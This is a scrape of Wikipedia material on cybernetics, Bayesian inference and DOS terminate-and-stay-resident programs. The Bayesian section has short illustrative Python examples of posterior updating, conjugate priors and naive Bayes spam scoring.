As cybernetics has developed, it has broadened in scope to include work in management, design,[4] pedagogy,[39][40] and the creative arts,[41] while also developing exchanges with constructivist philosophies, counter-cultural movements,[42] and media studies.[43] The development of management cybernetics has led to a variety of applications, notably to the national economy of Chile under the Allende government in Project Cybersyn. In design, cybernetics has been influential on interactive architecture, human-computer interaction,[44] design research,[45] and the development of systemic design and metadesign practices.
Cybernetics is often understood within the context of systems science, systems theory, and systems thinking.[46][47] Systems approaches influenced by cybernetics include critical systems thinking, which incorporates the viable system model; systemic design; and system dynamics, which is based on the concept of causal feedback loops.
Many fields trace their origins in whole or in part to work carried out in cybernetics, or were partially absorbed into cybernetics when it was developed. These include artificial intelligence, bionics, cognitive science, control theory, complexity science, computer science, information theory and robotics. Some aspects of modern artificial intelligence, particularly the social machine, are often described in cybernetic terms.[48]
Academic journals with focuses in cybernetics include:
Academic societies primarily concerned with cybernetics or aspects of it include:
Source: https://en.wikipedia.org/wiki/Cybernetics
Bayesian inference (/ˈbeɪziən/ BAY-zee-ən or /ˈbeɪʒən/ BAY-zhən)[1] is a method of statistical inference in which Bayes' theorem is used to calculate a probability of a hypothesis, given prior evidence, and to update it as more information becomes available. Fundamentally, Bayesian inference uses a prior distribution to estimate posterior probabilities. Bayesian inference is an important technique in statistics, and especially in mathematical statistics. Bayesian updating is particularly important in the dynamic analysis of a sequence of data. Bayesian inference has found application in a wide range of activities, including science, engineering, philosophy, medicine, sport, and law. In the philosophy of decision theory, Bayesian inference is closely related to subjective probability, often called "Bayesian probability".
Bayesian inference derives the posterior probability as a consequence of two antecedents: a prior probability and a "likelihood function" derived from a statistical model for the observed data. Bayesian inference computes the posterior probability according to Bayes' theorem:
\[ P(H\mid E)=\frac{P(E\mid H)\cdot P(H)}{P(E)}, \]
where
For different values of \(H\), only the factors \(P(H)\) and \(P(E\mid H)\), both in the numerator, affect the value of \(P(H\mid E)\) – the posterior probability of a hypothesis is proportional to its prior probability (its inherent likeliness) and the newly acquired likelihood (its compatibility with the new observed evidence).
In cases where \(\neg H\) ("not \(H\)"), the logical negation of \(H\), is a valid likelihood, Bayes' rule can be rewritten as follows:
\[
\begin{aligned}
P(H\mid E)&=\frac{P(E\mid H)\,P(H)}{P(E)}\\
&=\frac{P(E\mid H)\,P(H)}{P(E\mid H)\,P(H)+P(E\mid \neg H)\,P(\neg H)}\\
&=\frac{1}{1+\left(\frac{1}{P(H)}-1\right)\frac{P(E\mid \neg H)}{P(E\mid H)}}
\end{aligned}
\]
because \(P(E)=P(E\mid H)P(H)+P(E\mid \neg H)P(\neg H)\) and \(P(H)+P(\neg H)=1\). This focuses attention on the term \(\left(\tfrac{1}{P(H)}-1\right)\tfrac{P(E\mid \neg H)}{P(E\mid H)}\). If that term is approximately 1, then the probability of the hypothesis given the evidence, \(P(H\mid E)\), is about \(\tfrac{1}{2}\): the hypothesis is about as likely as not. If that term is very small, close to zero, then \(P(H\mid E)\) is close to 1, i.e. the hypothesis is quite likely given the evidence. If that term is very large, much larger than 1, then the hypothesis, given the evidence, is quite unlikely. If the hypothesis (without consideration of evidence) is unlikely, then \(P(H)\) is small (but not necessarily astronomically small), \(\tfrac{1}{P(H)}\) is much larger than 1, and this term can be approximated as \(\tfrac{P(E\mid \neg H)}{P(E\mid H)\cdot P(H)}\), so that the relevant probabilities can be compared directly to each other.
One quick and easy way to remember the equation is the rule of multiplication:
\[ P(E\cap H)=P(E\mid H)\,P(H)=P(H\mid E)\,P(E). \]
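Bayes' rule in the form above, with the evidence expanded by the law of total probability over \(H\) and \(\neg H\), is a one-line computation. The numbers below are hypothetical, chosen only for illustration:

```python
# Sketch of Bayes' rule P(H|E) = P(E|H) P(H) / P(E), with the evidence term
# expanded as P(E) = P(E|H) P(H) + P(E|~H) P(~H). Inputs are hypothetical.

def posterior(p_h, p_e_given_h, p_e_given_not_h):
    """Posterior P(H|E) from the prior and the two conditional likelihoods."""
    p_e = p_e_given_h * p_h + p_e_given_not_h * (1.0 - p_h)  # total probability
    return p_e_given_h * p_h / p_e

# A hypothesis with prior 0.3 whose evidence is three times as likely under H:
p = posterior(p_h=0.3, p_e_given_h=0.9, p_e_given_not_h=0.3)
# 0.27 / (0.27 + 0.21) = 0.5625
```

Note how the update tracks the discussion above: a likelihood ratio favouring \(H\) raises the posterior above the prior, and the posterior depends on \(P(E\mid H)\) and \(P(E\mid \neg H)\) only through their ratio.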
Bayesian updating is widely used and computationally convenient. However, it is not the only updating rule that might be considered rational.
Ian Hacking noted that traditional "Dutch book" arguments did not specify Bayesian updating: they left open the possibility that non-Bayesian updating rules could avoid Dutch books. Hacking wrote:[2] "And neither the Dutch book argument nor any other in the personalist arsenal of proofs of the probability axioms entails the dynamic assumption. Not one entails Bayesianism. So the personalist requires the dynamic assumption to be Bayesian. It is true that in consistency a personalist could abandon the Bayesian model of learning from experience. Salt could lose its savour."
Indeed, there are non-Bayesian updating rules that also avoid Dutch books (as discussed in the literature on "probability kinematics") following the publication of Richard C. Jeffrey's rule, which applies Bayes' rule to the case where the evidence itself is assigned a probability.[3] The additional hypotheses needed to uniquely require Bayesian updating have been deemed to be substantial, complicated, and unsatisfactory.[4]
If evidence is simultaneously used to update belief over a set of exclusive and exhaustive propositions, Bayesian inference may be thought of as acting on this belief distribution as a whole.
Suppose a process is generating independent and identically distributed events \(E_n,\ n=1,2,3,\ldots\), but the probability distribution is unknown. Let the event space \(\Omega\) represent the current state of belief for this process. Each model is represented by an event \(M_m\). The conditional probabilities \(P(E_n\mid M_m)\) are specified to define the models. \(P(M_m)\) is the degree of belief in \(M_m\). Before the first inference step, \(\{P(M_m)\}\) is a set of initial prior probabilities. These must sum to 1, but are otherwise arbitrary.
Suppose that the process is observed to generate \(E\in \{E_n\}\). For each \(M\in \{M_m\}\), the prior \(P(M)\) is updated to the posterior \(P(M\mid E)\). From Bayes' theorem:[5]
\[ P(M\mid E)=\frac{P(E\mid M)}{\sum_{m}P(E\mid M_m)\,P(M_m)}\cdot P(M). \]
Upon observation of further evidence, this procedure may be repeated.
For a sequence of independent and identically distributed observations \(\mathbf{E}=(e_1,\dots,e_n)\), it can be shown by induction that repeated application of the above is equivalent to
\[ P(M\mid \mathbf{E})=\frac{P(\mathbf{E}\mid M)}{\sum_{m}P(\mathbf{E}\mid M_m)\,P(M_m)}\cdot P(M), \]
where
\[ P(\mathbf{E}\mid M)=\prod_{k}P(e_k\mid M). \]
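The equivalence of one-at-a-time updating and a single batch update can be checked numerically. The two-model coin setup below is hypothetical, used only to exercise the update rule:

```python
# Sketch: updating beliefs over a finite model set one observation at a time
# agrees with a single batch update using the product of likelihoods, for
# i.i.d. observations. The two coin models here are hypothetical.

def update(priors, likelihoods):
    """One Bayes step over a finite model set: normalise prior * likelihood."""
    unnorm = [p * l for p, l in zip(priors, likelihoods)]
    z = sum(unnorm)
    return [u / z for u in unnorm]

# Two models for a biased coin: P(heads) = 0.5 or 0.8; observe H, H, T.
like = {"H": [0.5, 0.8], "T": [0.5, 0.2]}
beliefs = [0.5, 0.5]
for e in "HHT":
    beliefs = update(beliefs, like[e])                      # sequential updating

batch = update([0.5, 0.5], [0.5 * 0.5 * 0.5, 0.8 * 0.8 * 0.2])  # one batch step
# beliefs and batch agree (up to floating point).
```

The normalising denominator in `update` is exactly the sum \(\sum_m P(E\mid M_m)P(M_m)\) from the formula above.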
By parameterizing the space of models, the belief in all models may be updated in a single step. The distribution of belief over the model space may then be thought of as a distribution of belief over the parameter space. The distributions in this section are expressed as continuous, represented by probability densities, as this is the usual situation. The technique is, however, equally applicable to discrete distributions.
Let the vector \(\boldsymbol{\theta}\) span the parameter space. Let the initial prior distribution over \(\boldsymbol{\theta}\) be \(p(\boldsymbol{\theta}\mid \boldsymbol{\alpha})\), where \(\boldsymbol{\alpha}\) is a set of parameters to the prior itself, or hyperparameters. Let \(\mathbf{E}=(e_1,\dots,e_n)\) be a sequence of independent and identically distributed event observations, where all \(e_i\) are distributed as \(p(e\mid \boldsymbol{\theta})\) for some \(\boldsymbol{\theta}\). Bayes' theorem is applied to find the posterior distribution over \(\boldsymbol{\theta}\):
\[
\begin{aligned}
p(\boldsymbol{\theta}\mid \mathbf{E},\boldsymbol{\alpha})&=\frac{p(\mathbf{E}\mid \boldsymbol{\theta},\boldsymbol{\alpha})}{p(\mathbf{E}\mid \boldsymbol{\alpha})}\cdot p(\boldsymbol{\theta}\mid \boldsymbol{\alpha})\\
&=\frac{p(\mathbf{E}\mid \boldsymbol{\theta},\boldsymbol{\alpha})}{\int p(\mathbf{E}\mid \boldsymbol{\theta},\boldsymbol{\alpha})\,p(\boldsymbol{\theta}\mid \boldsymbol{\alpha})\,d\boldsymbol{\theta}}\cdot p(\boldsymbol{\theta}\mid \boldsymbol{\alpha}),
\end{aligned}
\]
where \(p(\mathbf{E}\mid \boldsymbol{\theta},\boldsymbol{\alpha})=\prod_{k}p(e_k\mid \boldsymbol{\theta})\).
\(P_X^{y}(A)=E(1_A(X)\mid Y=y)\). Existence and uniqueness of the needed conditional expectation is a consequence of the Radon–Nikodym theorem. This was formulated by Kolmogorov in his famous book from 1933. Kolmogorov underlines the importance of conditional probability by writing "I wish to call attention to ... and especially the theory of conditional probabilities and conditional expectations ..." in the Preface.[8] The Bayes theorem determines the posterior distribution from the prior distribution. Uniqueness requires continuity assumptions.[9] Bayes' theorem can be generalized to include improper prior distributions such as the uniform distribution on the real line.[10] Modern Markov chain Monte Carlo methods have boosted the importance of Bayes' theorem, including cases with improper priors.[11]
Bayesian theory calls for the use of the posterior predictive distribution to do predictive inference, i.e., to predict the distribution of a new, unobserved data point. That is, instead of a fixed point as a prediction, a distribution over possible points is returned. Only this way is the entire posterior distribution of the parameter(s) used. By comparison, prediction in frequentist statistics often involves finding an optimum point estimate of the parameter(s), for example by maximum likelihood or maximum a posteriori (MAP) estimation, and then plugging this estimate into the formula for the distribution of a data point. This has the disadvantage that it does not account for any uncertainty in the value of the parameter, and hence will underestimate the variance of the predictive distribution.
In some instances, frequentist statistics can work around this problem. For example, confidence intervals and prediction intervals in frequentist statistics, when constructed from a normal distribution with unknown mean and variance, are constructed using a Student's t-distribution. This correctly estimates the variance, due to the facts that (1) the average of normally distributed random variables is also normally distributed, and (2) the predictive distribution of a normally distributed data point with unknown mean and variance, using conjugate or uninformative priors, has a Student's t-distribution. In Bayesian statistics, however, the posterior predictive distribution can always be determined exactly, or at least to an arbitrary level of precision when numerical methods are used.
Both types of predictive distributions have the form of a compound probability distribution (as does the marginal likelihood). In fact, if the prior distribution is a conjugate prior, such that the prior and posterior distributions come from the same family, it can be seen that both prior and posterior predictive distributions also come from the same family of compound distributions. The only difference is that the posterior predictive distribution uses the updated values of the hyperparameters (applying the Bayesian update rules given in the conjugate prior article), while the prior predictive distribution uses the values of the hyperparameters that appear in the prior distribution.
If \(\tfrac{P(E\mid M)}{P(E)}>1\), then \(P(E\mid M)>P(E)\): if the model were true, the evidence would be more likely than is predicted by the current state of belief, and belief in the model increases. The reverse applies for a decrease in belief. If the belief does not change, then \(\tfrac{P(E\mid M)}{P(E)}=1\) and \(P(E\mid M)=P(E)\): the evidence is independent of the model, and, if the model were true, the evidence would be exactly as likely as predicted by the current state of belief.
If \(P(M)=0\) then \(P(M\mid E)=0\). If \(P(M)=1\) and \(P(E)>0\), then \(P(M\mid E)=1\). This can be interpreted to mean that hard convictions are insensitive to counter-evidence.
The former follows directly from Bayes' theorem. The latter can be derived by applying the first rule to the event "not \(M\)" in place of "\(M\)", yielding "if \(1-P(M)=0\), then \(1-P(M\mid E)=0\)", from which the result immediately follows.
Consider the behaviour of a belief distribution as it is updated a large number of times with independent and identically distributed trials. For sufficiently nice prior probabilities, the Bernstein–von Mises theorem gives that in the limit of infinite trials, the posterior converges to a Gaussian distribution independent of the initial prior, under conditions first outlined and rigorously proven by Joseph L. Doob in 1948, namely if the random variable in consideration has a finite probability space. The more general results were obtained later by the statistician David A. Freedman, who established in two seminal research papers in 1963[12] and 1965[13] when and under what circumstances the asymptotic behaviour of the posterior is guaranteed. His 1963 paper treats, like Doob (1949), the finite case and comes to a satisfactory conclusion. However, if the random variable has an infinite but countable probability space (i.e., corresponding to a die with infinitely many faces), the 1965 paper demonstrates that for a dense subset of priors the Bernstein–von Mises theorem is not applicable. In this case there is almost surely no asymptotic convergence. Later in the 1980s and 1990s Freedman and Persi Diaconis continued to work on the case of infinite countable probability spaces.[14] To summarise, there may be insufficient trials to suppress the effects of the initial choice, and especially for large (but finite) systems the convergence might be very slow.
In parameterized form, the prior distribution is often assumed to come from a family of distributions called conjugate priors. The usefulness of a conjugate prior is that the corresponding posterior distribution will be in the same family, and the calculation may be expressed in closed form.
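The classic conjugate pair is a Beta prior on a Bernoulli success probability: the posterior is again a Beta distribution, with the observation counts simply added to the hyperparameters. A minimal sketch, with assumed hyperparameters and counts:

```python
# Sketch of a conjugate update: a Beta(a, b) prior on a Bernoulli success
# probability yields a Beta(a + successes, b + failures) posterior in closed
# form. The hyperparameters and counts below are assumed for illustration.

def beta_bernoulli_update(a, b, successes, failures):
    """Closed-form posterior hyperparameters for the Beta-Bernoulli pair."""
    return a + successes, b + failures

# Uniform prior Beta(1, 1), then observe 7 successes and 3 failures:
a, b = beta_bernoulli_update(a=1, b=1, successes=7, failures=3)
posterior_mean = a / (a + b)   # mean of Beta(a, b) is a / (a + b), here 8/12
```

No integration is needed: the entire update is bookkeeping on the hyperparameters, which is exactly what "expressed in closed form" means here.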
It is often desired to use a posterior distribution to estimate a parameter or variable. Several methods of Bayesian estimation select measurements of central tendency from the posterior distribution.
For one-dimensional problems, a unique median exists for practical continuous problems. The posterior median is attractive as a robust estimator.[15]
If there exists a finite mean for the posterior distribution, then the posterior mean is a method of estimation:[16]
\[ \tilde{\theta}=\operatorname{E}[\theta]=\int \theta\,p(\theta\mid \mathbf{X},\alpha)\,d\theta \]
Taking a value with the greatest probability defines maximum a posteriori (MAP) estimates:[17]
\[ \{\theta_{\text{MAP}}\}\subset \arg\max_{\theta}p(\theta\mid \mathbf{X},\alpha). \]
There are examples where no maximum is attained, in which case the set of MAP estimates is empty.
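The three point estimates just described (posterior mean, median, and MAP) can be read off a discretised posterior. The grid and the unnormalised density below are hypothetical, shaped like a Beta(8, 4) posterior:

```python
# Sketch: posterior mean, median, and MAP computed from a discretised
# posterior. The grid and unnormalised density are hypothetical (a
# Beta(8, 4)-shaped density, as after 7 successes and 3 failures).

grid = [i / 100 for i in range(1, 100)]            # theta values in (0, 1)
unnorm = [t**7 * (1 - t)**3 for t in grid]         # unnormalised posterior
z = sum(unnorm)
post = [u / z for u in unnorm]                     # normalised grid weights

mean = sum(t * p for t, p in zip(grid, post))      # posterior mean
map_est = grid[max(range(len(post)), key=post.__getitem__)]  # argmax = mode

cum, median = 0.0, None
for t, p in zip(grid, post):                       # first t with CDF >= 0.5
    cum += p
    if cum >= 0.5:
        median = t
        break
# MAP is 0.70, the mode (8-1)/(8+4-2) of a Beta(8, 4) density.
```

On an asymmetric posterior like this one the three estimates genuinely differ, which is why the choice among them is usually tied to a loss function, as the next paragraph notes.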
There are other methods of estimation that minimize the posterior risk (expected posterior loss) with respect to a loss function, and these are of interest to statistical decision theory using the sampling distribution ("frequentist statistics").[18]
The posterior predictive distribution of a new observation \(\tilde{x}\) (that is independent of previous observations) is determined by[19]
\[ p(\tilde{x}\mid \mathbf{X},\alpha)=\int p(\tilde{x},\theta\mid \mathbf{X},\alpha)\,d\theta=\int p(\tilde{x}\mid \theta)\,p(\theta\mid \mathbf{X},\alpha)\,d\theta. \]
Suppose there are two full bowls of cookies. Bowl #1 has 10 chocolate chip and 30 plain cookies, while bowl #2 has 20 of each. Our friend Fred picks a bowl at random, and then picks a cookie at random. We may assume there is no reason to believe Fred treats one bowl differently from another, likewise for the cookies. The cookie turns out to be a plain one. How probable is it that Fred picked it out of bowl #1?
Intuitively, it seems clear that the answer should be more than a half, since there are more plain cookies in bowl #1. The precise answer is given by Bayes' theorem. Let \(H_1\) correspond to bowl #1, and \(H_2\) to bowl #2.
It is given that the bowls are identical from Fred's point of view, thus \(P(H_1)=P(H_2)\), and the two must add up to 1, so both are equal to 0.5.
The event \(E\) is the observation of a plain cookie. From the contents of the bowls, we know that \(P(E\mid H_1)=30/40=0.75\) and \(P(E\mid H_2)=20/40=0.5\). Bayes' formula then yields
\[
\begin{aligned}
P(H_1\mid E)&=\frac{P(E\mid H_1)\,P(H_1)}{P(E\mid H_1)\,P(H_1)+P(E\mid H_2)\,P(H_2)}\\
&=\frac{0.75\times 0.5}{0.75\times 0.5+0.5\times 0.5}\\
&=0.6
\end{aligned}
\]
Before we observed the cookie, the probability we assigned for Fred having chosen bowl #1 was the prior probability, \(P(H_1)\), which was 0.5. After observing the cookie, we must revise the probability to \(P(H_1\mid E)\), which is 0.6.
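The cookie calculation can be checked numerically with the same quantities used in the derivation:

```python
# The cookie example worked numerically: two equally likely bowls, a plain
# cookie observed, posterior computed with Bayes' theorem.

p_h1 = p_h2 = 0.5
p_e_h1 = 30 / 40     # plain cookies as a fraction of bowl #1
p_e_h2 = 20 / 40     # plain cookies as a fraction of bowl #2

p_e = p_e_h1 * p_h1 + p_e_h2 * p_h2        # total probability of a plain cookie
p_h1_given_e = p_e_h1 * p_h1 / p_e         # 0.375 / 0.625 = 0.6
```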
An archaeologist is working at a site thought to be from the medieval period, between the 11th and the 16th century. However, it is uncertain exactly when in this period the site was inhabited. Fragments of pottery are found, some of which are glazed and some of which are decorated. It is expected that if the site were inhabited during the early medieval period, then 1% of the pottery would be glazed and 50% of its area decorated, whereas if it had been inhabited in the late medieval period then 81% would be glazed and 5% of its area decorated. How confident can the archaeologist be in the date of inhabitation as fragments are unearthed?
The degree of belief in the continuous variable \(C\) (century) is to be calculated, with the discrete set of events \(\{GD, G\bar{D}, \bar{G}D, \bar{G}\bar{D}\}\) as evidence. Assuming linear variation of glaze and decoration with time, and that these variables are independent,
\[
\begin{aligned}
P(E=GD\mid C=c)&=\Bigl(0.01+\tfrac{0.81-0.01}{16-11}(c-11)\Bigr)\Bigl(0.5-\tfrac{0.5-0.05}{16-11}(c-11)\Bigr)\\
P(E=G\bar{D}\mid C=c)&=\Bigl(0.01+\tfrac{0.81-0.01}{16-11}(c-11)\Bigr)\Bigl(0.5+\tfrac{0.5-0.05}{16-11}(c-11)\Bigr)\\
P(E=\bar{G}D\mid C=c)&=\Bigl((1-0.01)-\tfrac{0.81-0.01}{16-11}(c-11)\Bigr)\Bigl(0.5-\tfrac{0.5-0.05}{16-11}(c-11)\Bigr)\\
P(E=\bar{G}\bar{D}\mid C=c)&=\Bigl((1-0.01)-\tfrac{0.81-0.01}{16-11}(c-11)\Bigr)\Bigl(0.5+\tfrac{0.5-0.05}{16-11}(c-11)\Bigr)
\end{aligned}
\]
Assume a uniform prior of \(f_C(c)=0.2\), and that trials are independent and identically distributed. When a new fragment of type \(e\) is discovered, Bayes' theorem is applied to update the degree of belief for each \(c\):
\[ f_C(c\mid E=e)=\frac{P(E=e\mid C=c)}{P(E=e)}\,f_C(c)=\frac{P(E=e\mid C=c)}{\int_{11}^{16}P(E=e\mid C=c)\,f_C(c)\,dc}\,f_C(c) \]
A computer simulation of the changing belief as 50 fragments are unearthed is shown on the graph. In the simulation, the site was inhabited around 1420, or \(c=15.2\). By calculating the area under the relevant portion of the graph for 50 trials, the archaeologist can say that there is practically no chance the site was inhabited in the 11th and 12th centuries, about 1% chance that it was inhabited during the 13th century, 63% chance during the 14th century and 36% during the 15th century. The Bernstein–von Mises theorem asserts here the asymptotic convergence to the "true" distribution because the probability space corresponding to the discrete set of events \(\{GD, G\bar{D}, \bar{G}D, \bar{G}\bar{D}\}\) is finite (see the above section on asymptotic behaviour of the posterior).
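A simulation of this kind can be sketched with a grid approximation of the century axis. The likelihood function below implements the linear glaze/decoration model from the example; the particular sequence of finds is hypothetical (not the 50-fragment run behind the quoted percentages):

```python
# Sketch of the archaeology update on a discretised century axis. The
# likelihood implements the linear glaze/decoration model from the text;
# the sequence of finds is hypothetical.

def likelihood(glazed, decorated, c):
    """P(fragment type | C = c) for c in [11, 16], variables independent."""
    p_g = 0.01 + (0.81 - 0.01) / 5 * (c - 11)   # glazed fraction, linear in c
    p_d = 0.5 - (0.5 - 0.05) / 5 * (c - 11)     # decorated fraction, linear in c
    return (p_g if glazed else 1 - p_g) * (p_d if decorated else 1 - p_d)

grid = [11 + i * 5 / 500 for i in range(501)]   # centuries 11..16
belief = [1.0] * len(grid)                      # uniform prior, unnormalised

# Hypothetical finds: three glazed-undecorated fragments, one unglazed-decorated.
for glazed, decorated in [(True, False), (True, False), (True, False), (False, True)]:
    belief = [b * likelihood(glazed, decorated, c) for b, c in zip(belief, grid)]

z = sum(belief)
belief = [b / z for b in belief]                # normalised grid posterior
```

Because glazing is far more common late in the period (81% vs 1%), even a few glazed fragments shift the posterior mass toward the later centuries, mirroring the behaviour shown in the simulation graph.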
A decision-theoretic justification of the use of Bayesian inference was given by Abraham Wald, who proved that every unique Bayesian procedure is admissible. Conversely, every admissible statistical procedure is either a Bayesian procedure or a limit of Bayesian procedures.[20]
Wald characterized admissible procedures as Bayesian procedures (and limits of Bayesian procedures), making the Bayesian formalism a central technique in such areas of frequentist inference as parameter estimation, hypothesis testing, and computing confidence intervals.[21][22][23] For example:
Bayesian methodology also plays a role in model selection, where the aim is to select, from a set of competing models, the one that most closely represents the underlying process that generated the observed data. In Bayesian model comparison, the model with the highest posterior probability given the data is selected. The posterior probability of a model depends on the evidence, or marginal likelihood, which reflects the probability that the data is generated by the model, and on the prior belief in the model. When two competing models are a priori considered to be equiprobable, the ratio of their posterior probabilities corresponds to the Bayes factor. Since Bayesian model comparison is aimed at selecting the model with the highest posterior probability, this methodology is also referred to as the maximum a posteriori (MAP) selection rule[28] or the MAP probability rule.[29]
While conceptually simple, Bayesian methods can be mathematically and numerically challenging. Probabilistic programming languages (PPLs) implement functions to easily build Bayesian models together with efficient automatic inference methods. This helps separate the model building from the inference, allowing practitioners to focus on their specific problems and leaving PPLs to handle the computational details for them.[30][31][32]
See the separate Wikipedia entry on Bayesian statistics, specifically the statistical modeling section in that page.
Bayesian inference has applications in artificial intelligence and expert systems. Bayesian inference techniques have been a fundamental part of computerized pattern recognition techniques since the late 1950s.[33] There is also an ever-growing connection between Bayesian methods and simulation-based Monte Carlo techniques, since complex models cannot be processed in closed form by a Bayesian analysis, while a graphical model structure may allow for efficient simulation algorithms like Gibbs sampling and other Metropolis–Hastings algorithm schemes.[34] Recently[when?] Bayesian inference has gained popularity among the phylogenetics community for these reasons; a number of applications allow many demographic and evolutionary parameters to be estimated simultaneously.
As applied to statistical classification, Bayesian inference has been used to develop algorithms for identifying e-mail spam. Applications which make use of Bayesian inference for spam filtering include CRM114, DSPAM, Bogofilter, SpamAssassin, SpamBayes, Mozilla, XEAMS, and others. Spam classification is treated in more detail in the article on the naïve Bayes classifier.
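The core of such filters can be sketched as a toy naive Bayes classifier. This is not the implementation of any of the filters named above: the word likelihoods and class priors below are hypothetical, and per-word probabilities are multiplied under the naive independence assumption:

```python
# Toy naive-Bayes spam sketch (hypothetical word likelihoods and priors, not
# any real filter): per-word likelihoods are combined under the independence
# assumption and turned into a posterior via Bayes' theorem in log space.

import math

p_word = {
    "spam": {"offer": 0.6, "meeting": 0.05, "free": 0.7},
    "ham":  {"offer": 0.1, "meeting": 0.5,  "free": 0.1},
}
prior = {"spam": 0.4, "ham": 0.6}

def spam_score(words):
    """Posterior P(spam | words) under the naive independence assumption."""
    logp = {c: math.log(prior[c]) + sum(math.log(p_word[c][w]) for w in words)
            for c in ("spam", "ham")}
    odds = math.exp(logp["spam"] - logp["ham"])   # posterior odds spam : ham
    return odds / (1 + odds)

score = spam_score(["free", "offer"])   # words typical of spam -> high score
```

Working in log space replaces the long product of small likelihoods with a sum, which avoids floating-point underflow on realistic message lengths.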
Solomonoff's inductive inference is the theory of prediction based on observations; for example, predicting the next symbol based upon a given series of symbols. The only assumption is that the environment follows some unknown but computable probability distribution. It is a formal inductive framework that combines two well-studied principles of inductive inference: Bayesian statistics and Occam's razor.[35][unreliable source?] Solomonoff's universal prior probability of any prefix p of a computable sequence x is the sum of the probabilities of all programs (for a universal computer) that compute something starting with p. Given some p and any computable but unknown probability distribution from which x is sampled, the universal prior and Bayes' theorem can be used to predict the yet unseen parts of x in optimal fashion.[36][37]
Bayesian inference has been applied in different bioinformatics applications, including differential gene expression analysis.[38] Bayesian inference is also used in a general cancer risk model, called CIRI (Continuous Individualized Risk Index), in which serial measurements are incorporated to update a Bayesian model that is primarily built from prior knowledge.[39][40]
Bayesian inference can be used by jurors to coherently accumulate the evidence for and against a defendant, and to see whether, in totality, it meets their personal threshold for "beyond a reasonable doubt".[41][42][43] Bayes' theorem is applied successively to all evidence presented, with the posterior from one stage becoming the prior for the next. The benefit of a Bayesian approach is that it gives the juror an unbiased, rational mechanism for combining evidence. It may be appropriate to explain Bayes' theorem to jurors in odds form, as betting odds are more widely understood than probabilities. Alternatively, a logarithmic approach, replacing multiplication with addition, might be easier for a jury to handle.
If the existence of the crime is not in doubt, only the identity of the culprit, it has been suggested that the prior should be uniform over the qualifying population.[44]For example, if 1,000 people could have committed the crime, the prior probability of guilt would be 1/1000.
The use of Bayes' theorem by jurors is controversial. In the United Kingdom, a defence expert witness explained Bayes' theorem to the jury in R v Adams. The jury convicted, but the case went to appeal on the basis that no means of accumulating evidence had been provided for jurors who did not wish to use Bayes' theorem. The Court of Appeal upheld the conviction, but it also gave the opinion that "To introduce Bayes' Theorem, or any similar method, into a criminal trial plunges the jury into inappropriate and unnecessary realms of theory and complexity, deflecting them from their proper task."
Gardner-Medwin[45] argues that the criterion on which a verdict in a criminal trial should be based is not the probability of guilt, but rather the probability of the evidence, given that the defendant is innocent (akin to a frequentist p-value). He argues that if the posterior probability of guilt is to be computed by Bayes' theorem, the prior probability of guilt must be known. This will depend on the incidence of the crime, which is an unusual piece of evidence to consider in a criminal trial. Consider the following three propositions: A, the known facts and testimony could have arisen if the defendant is guilty; B, the known facts and testimony could have arisen if the defendant is innocent; C, the defendant is guilty.
Gardner-Medwin argues that the jury should believe both A and not-B in order to convict. A and not-B implies the truth of C, but the reverse is not true. It is possible that B and C are both true, but in this case he argues that a jury should acquit, even though they know that they will be letting some guilty people go free. See also Lindley's paradox.
Bayesian epistemology is a movement that advocates for Bayesian inference as a means of justifying the rules of inductive logic.
Karl Popper and David Miller have rejected the idea of Bayesian rationalism, i.e. using Bayes' rule to make epistemological inferences:[46] It is prone to the same vicious circle as any other justificationist epistemology, because it presupposes what it attempts to justify. According to this view, a rational interpretation of Bayesian inference would see it merely as a probabilistic version of falsification, rejecting the belief, commonly held by Bayesians, that high likelihood achieved by a series of Bayesian updates would prove the hypothesis beyond any reasonable doubt, or even with likelihood greater than 0.
The problem considered by Bayes in Proposition 9 of his essay, "An Essay Towards Solving a Problem in the Doctrine of Chances", is the posterior distribution for the parameter a (the success rate) of the binomial distribution.[citation needed]
The term Bayesian refers to Thomas Bayes (1701–1761), who proved that probabilistic limits could be placed on an unknown event.[citation needed] However, it was Pierre-Simon Laplace (1749–1827) who introduced (as Principle VI) what is now called Bayes' theorem and used it to address problems in celestial mechanics, medical statistics, reliability, and jurisprudence.[54] Early Bayesian inference, which used uniform priors following Laplace's principle of insufficient reason, was called "inverse probability" (because it infers backwards from observations to parameters, or from effects to causes[55]). After the 1920s, "inverse probability" was largely supplanted by a collection of methods that came to be called frequentist statistics.[55]
In the 20th century, the ideas of Laplace were further developed in two different directions, giving rise to objective and subjective currents in Bayesian practice. In the objective or "non-informative" current, the statistical analysis depends on only the model assumed, the data analyzed,[56] and the method assigning the prior, which differs from one objective Bayesian practitioner to another. In the subjective or "informative" current, the specification of the prior depends on the belief (that is, propositions on which the analysis is prepared to act), which can summarize information from experts, previous studies, etc.
In the 1980s, there was a dramatic growth in research and applications of Bayesian methods, mostly attributed to the discovery of Markov chain Monte Carlo methods, which removed many of the computational problems, and an increasing interest in nonstandard, complex applications.[57] Despite the growth of Bayesian research, most undergraduate teaching is still based on frequentist statistics.[58] Nonetheless, Bayesian methods are widely accepted and used, for example in the field of machine learning.[59]
The following books are listed in ascending order of probabilistic sophistication:
|
https://en.wikipedia.org/wiki/Bayesian_inference
|
A terminate-and-stay-resident program (commonly TSR) is a computer program running under DOS that uses a system call to return control to DOS as though it has finished, but remains in computer memory so it can be reactivated later.[1] This technique partially overcame DOS's limitation of executing only one program, or task, at a time. TSRs are used only in DOS, not in Windows.
Some TSRs are utility software that a computer user might call up several times a day, while working in another program, by using a hotkey. Borland Sidekick was an early and popular example of this type. Others serve as device drivers for hardware that the operating system does not directly support.
Normally DOS can run only one program at a time. When a program finishes, it returns control to DOS using the system call INT 21h/4Ch of the DOS API.[2] The memory and system resources used are then marked as unused. This makes it impossible to restart parts of the program without having to reload it all. However, if a program ends with the system call INT 27h or INT 21h/31h, the operating system does not reuse a certain specified part of its memory.
The original call, INT 27h, is called "terminate but stay resident", hence the name "TSR". Using this call, a program can make up to 64 KB of its memory resident. MS-DOS version 2.0 introduced an improved call, INT 21h/31h ('Keep Process'), which removed this limitation and let the program return an exit code. Before making this call, the program can install one or several interrupt handlers pointing into itself, so that it can be called again. Installing a hardware interrupt vector allows such a program to react to hardware events. Installing a software interrupt vector allows it to be called by the currently running program. Installing a timer interrupt handler allows a TSR to run periodically (using a programmable interval timer).
The typical method of using an interrupt vector involves reading its present value (the address), storing it within the memory space of the TSR, and replacing it with an address in its own code. The stored address is called from the TSR, in effect forming a singly linked list of interrupt handlers, also called interrupt service routines, or ISRs. This procedure of installing ISRs is called chaining or hooking an interrupt or an interrupt vector.
